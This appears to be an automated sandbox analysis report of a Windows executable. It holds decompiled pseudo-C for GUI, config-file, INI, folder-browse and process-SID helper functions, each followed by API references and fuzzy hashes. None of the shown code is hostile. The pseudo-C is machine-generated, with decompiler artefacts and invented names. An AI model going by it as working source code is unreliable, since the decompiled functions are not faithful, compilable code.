                                                                                      			}










                                                                                      APIs
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                      • String ID: $
                                                                                      • API String ID: 2498372239-3993045852
                                                                                      • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                      • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                      				int _t14;
                                                                                      
                                                                                      				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                      					GetKeyState(0xa2);
                                                                                      					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                      						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                      							_t14 = E00403A60(0xa5);
                                                                                      							if(_t14 == 0) {
                                                                                      								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                      			}





                                                                                      APIs
                                                                                      • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                        • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                      • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: State$CallMessageProcSendWindow
                                                                                      • String ID: A
                                                                                      • API String ID: 3924021322-3554254475
                                                                                      • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                      • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 91%
                                                                                      			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                      				intOrPtr _v20;
                                                                                      				char _v1072;
                                                                                      				void _v3672;
                                                                                      				char _v4496;
                                                                                      				intOrPtr _v4556;
                                                                                      				char _v4560;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t41;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				_t45 = __eflags;
                                                                                      				E0040B550(0x11cc, __ecx);
                                                                                      				E00402923( &_v4560);
                                                                                      				_v4560 = 0x40db44;
                                                                                      				E00406670( &_v4496, _t45);
                                                                                      				_v4496 = 0x40dab0;
                                                                                      				memset( &_v3672, 0, 0x10);
                                                                                      				E0040A909( &_v1072);
                                                                                      				_t41 = _a4;
                                                                                      				_v4556 = 0x71;
                                                                                      				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                      					L0040B266();
                                                                                      					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                      				}
                                                                                      				_v4496 = 0x40dab0;
                                                                                      				_v4560 = 0x40db44;
                                                                                      				E004067AC( &_v4496);
                                                                                      				return E00402940( &_v4560);
                                                                                      			}














                                                                                      APIs
                                                                                        • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                      • memset.MSVCRT ref: 00403537
                                                                                      • _ultow.MSVCRT ref: 00403575
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset$_ultow
                                                                                      • String ID: cf@$q
                                                                                      • API String ID: 3448780718-2693627795
                                                                                      • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                      • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E00402F31(void* _a4) {
                                                                                      				void _v530;
                                                                                      				long _v532;
                                                                                      				void* __edi;
                                                                                      				wchar_t* _t15;
                                                                                      				intOrPtr _t18;
                                                                                      				short* _t19;
                                                                                      				void* _t29;
                                                                                      
                                                                                      				_v532 = _v532 & 0x00000000;
                                                                                      				memset( &_v530, 0, 0x208);
                                                                                      				E00404AD9( &_v532);
                                                                                      				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                      				if(_t15 != 0) {
                                                                                      					 *_t15 =  *_t15 & 0x00000000;
                                                                                      				}
                                                                                      				wcscat( &_v532, L".cfg");
                                                                                      				_t18 =  *0x40fa74; // 0x4101c8
                                                                                      				_t19 = _t18 + 0x5504;
                                                                                      				_t36 =  *_t19;
                                                                                      				_pop(_t29);
                                                                                      				if( *_t19 != 0) {
                                                                                      					E00404923(0x104,  &_v532, _t19);
                                                                                      					_pop(_t29);
                                                                                      				}
                                                                                      				return E00402FC6(_t29, _t36,  &_v532);
                                                                                      			}











                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402F51
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 00402F6F
                                                                                      • wcscat.MSVCRT ref: 00402F8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                      • String ID: .cfg
                                                                                      • API String ID: 776488737-3410578098
                                                                                      • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                      • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                      • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                      • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                      				void _v514;
                                                                                      				signed short _v516;
                                                                                      				void _v1026;
                                                                                      				signed short _v1028;
                                                                                      				void* __esi;
                                                                                      				void* _t17;
                                                                                      				intOrPtr* _t26;
                                                                                      				signed short* _t28;
                                                                                      
                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                      				_t26 = __ecx;
                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                      				_v1028 = _v1028 & 0x00000000;
                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                      				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                      				_t28 =  &_v516;
                                                                                      				E00407250(_t28, _t17);
                                                                                      				_push(_t28);
                                                                                      				_push(L"</%s>\r\n");
                                                                                      				_push(0xff);
                                                                                      				_push( &_v1028);
                                                                                      				L0040B1EC();
                                                                                      				return E00407343(_t26, _a4,  &_v1028);
                                                                                      			}












                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407E48
                                                                                      • memset.MSVCRT ref: 00407E5F
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407E8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                      • String ID: </%s>
                                                                                      • API String ID: 3400436232-259020660
                                                                                      • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                      • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                      				void _v8198;
                                                                                      				short _v8200;
                                                                                      				void* _t9;
                                                                                      				void* _t12;
                                                                                      				intOrPtr _t19;
                                                                                      				intOrPtr _t20;
                                                                                      
                                                                                      				_t19 = __ecx;
                                                                                      				_t9 = E0040B550(0x2004, __ecx);
                                                                                      				_t20 = _t19;
                                                                                      				if(_t20 == 0) {
                                                                                      					_t20 =  *0x40fe24; // 0x0
                                                                                      				}
                                                                                      				_t25 =  *0x40fb90;
                                                                                      				if( *0x40fb90 != 0) {
                                                                                      					_v8200 = _v8200 & 0x00000000;
                                                                                      					memset( &_v8198, 0, 0x2000);
                                                                                      					_push(_t20);
                                                                                      					_t12 = 5;
                                                                                      					E00405E8D(_t12);
                                                                                      					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                      						SetWindowTextW(_a4,  &_v8200);
                                                                                      					}
                                                                                      					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                      				}
                                                                                      				return _t9;
                                                                                      			}










                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                      • String ID: caption
                                                                                      • API String ID: 1523050162-4135340389
                                                                                      • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                      • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                      				struct HINSTANCE__* _t11;
                                                                                      				struct HINSTANCE__** _t14;
                                                                                      				struct HINSTANCE__* _t15;
                                                                                      
                                                                                      				_t14 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                      					_t11 = E00405436(L"winsta.dll");
                                                                                      					 *_t14 = _t11;
                                                                                      					if(_t11 != 0) {
                                                                                      						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                      					}
                                                                                      				}
                                                                                      				_t15 = _t14[1];
                                                                                      				if(_t15 == 0) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                      				}
                                                                                      			}







                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                      • API String ID: 946536540-379566740
                                                                                      • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                      • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                      				signed int _t21;
                                                                                      				signed int _t23;
                                                                                      				void* _t24;
                                                                                      				signed int _t31;
                                                                                      				void* _t33;
                                                                                      				void* _t44;
                                                                                      				signed int _t46;
                                                                                      				void* _t48;
                                                                                      				signed int _t51;
                                                                                      				int _t52;
                                                                                      				void** _t53;
                                                                                      				void* _t58;
                                                                                      
                                                                                      				_t53 = __esi;
                                                                                      				_t1 =  &(_t53[1]); // 0x0
                                                                                      				_t51 =  *_t1;
                                                                                      				_t21 = 0;
                                                                                      				if(_t51 <= 0) {
                                                                                      					L4:
                                                                                      					_t2 =  &(_t53[2]); // 0x8
                                                                                      					_t33 =  *_t53;
                                                                                      					_t23 =  *_t2 + _t51;
                                                                                      					_t46 = 8;
                                                                                      					_t53[1] = _t23;
                                                                                      					_t24 = _t23 * _t46;
                                                                                      					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                      					L0040B26C();
                                                                                      					_t10 =  &(_t53[1]); // 0x0
                                                                                      					 *_t53 = _t24;
                                                                                      					memset(_t24, 0,  *_t10 << 3);
                                                                                      					_t52 = _t51 << 3;
                                                                                      					memcpy( *_t53, _t33, _t52);
                                                                                      					if(_t33 != 0) {
                                                                                      						_push(_t33);
                                                                                      						L0040B272();
                                                                                      					}
                                                                                      					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                      					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                      				} else {
                                                                                      					_t44 =  *__esi;
                                                                                      					_t48 = _t44;
                                                                                      					while( *_t48 != 0) {
                                                                                      						_t21 = _t21 + 1;
                                                                                      						_t48 = _t48 + 8;
                                                                                      						_t58 = _t21 - _t51;
                                                                                      						if(_t58 < 0) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							goto L4;
                                                                                      						}
                                                                                      						goto L7;
                                                                                      					}
                                                                                      					_t31 = _t21 << 3;
                                                                                      					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                      					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                      				}
                                                                                      				L7:
                                                                                      				return 1;
                                                                                      			}
















                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1865533344-0
                                                                                      • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                      • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 35%
                                                                                      			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                      				char _v16390;
                                                                                      				short _v16392;
                                                                                      				void* __edi;
                                                                                      				intOrPtr* _t30;
                                                                                      				intOrPtr* _t34;
                                                                                      				signed int _t36;
                                                                                      				signed int _t37;
                                                                                      
                                                                                      				_t30 = __ecx;
                                                                                      				E0040B550(0x4004, __ecx);
                                                                                      				_push(0x4000);
                                                                                      				_push(0);
                                                                                      				_v16392 = 0;
                                                                                      				_t34 = _t30;
                                                                                      				_push( &_v16390);
                                                                                      				if(_a4 == 0) {
                                                                                      					memset();
                                                                                      					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
                                                                                      					asm("sbb esi, esi");
                                                                                      					_t37 =  ~_t36;
                                                                                      					E004051B8( &_v16392, _t34, _a16);
                                                                                      				} else {
                                                                                      					memset();
                                                                                      					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                      					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                      				}
                                                                                      				return _t37;
                                                                                      			}











                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409E08
                                                                                        • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                        • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                      • memset.MSVCRT ref: 00409E3B
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1127616056-0
                                                                                      • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                      • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                      • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                      • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                      				void* _v8;
                                                                                      				wchar_t* _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				char _v40;
                                                                                      				long _v564;
                                                                                      				char* _t18;
                                                                                      				char* _t22;
                                                                                      				wchar_t* _t23;
                                                                                      				intOrPtr* _t24;
                                                                                      				intOrPtr* _t26;
                                                                                      				intOrPtr _t30;
                                                                                      				void* _t35;
                                                                                      				char* _t36;
                                                                                      
                                                                                      				_t18 =  &_v8;
                                                                                      				_t30 = 0;
                                                                                      				__imp__SHGetMalloc(_t18);
                                                                                      				if(_t18 >= 0) {
                                                                                      					_v40 = _a4;
                                                                                      					_v28 = _a8;
                                                                                      					_t22 =  &_v40;
                                                                                      					_v36 = 0;
                                                                                      					_v32 = 0;
                                                                                      					_v24 = 4;
                                                                                      					_v20 = E0040AC81;
                                                                                      					_v16 = __esi;
                                                                                      					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                      					_t36 = _t22;
                                                                                      					if(_t36 != 0) {
                                                                                      						_t23 =  &_v564;
                                                                                      						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                      						if(_t23 != 0) {
                                                                                      							_t30 = 1;
                                                                                      							wcscpy(__esi,  &_v564);
                                                                                      						}
                                                                                      						_t24 = _v8;
                                                                                      						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                      						_t26 = _v8;
                                                                                      						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                      					}
                                                                                      				}
                                                                                      				return _t30;
                                                                                      			}





















                                                                                      APIs
                                                                                      • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                      • wcscpy.MSVCRT ref: 0040AD65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3917621476-0
                                                                                      • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                      • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                      				long _v8;
                                                                                      				long _v12;
                                                                                      				long _t13;
                                                                                      				void* _t14;
                                                                                      				struct HWND__* _t24;
                                                                                      
                                                                                      				_t24 = GetDlgItem(_a4, _a8);
                                                                                      				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                      				_v12 = _t13;
                                                                                      				_v8 = 0;
                                                                                      				if(_t13 <= 0) {
                                                                                      					L3:
                                                                                      					_t14 = 0;
                                                                                      				} else {
                                                                                      					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                      						_v8 = _v8 + 1;
                                                                                      						if(_v8 < _v12) {
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							goto L3;
                                                                                      						}
                                                                                      						goto L4;
                                                                                      					}
                                                                                      					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                      					_t14 = 1;
                                                                                      				}
                                                                                      				L4:
                                                                                      				return _t14;
                                                                                      			}








                                                                                      APIs
                                                                                      • GetDlgItem.USER32 ref: 00404A52
                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item
                                                                                      • String ID:
                                                                                      • API String ID: 3888421826-0
                                                                                      • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                      • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
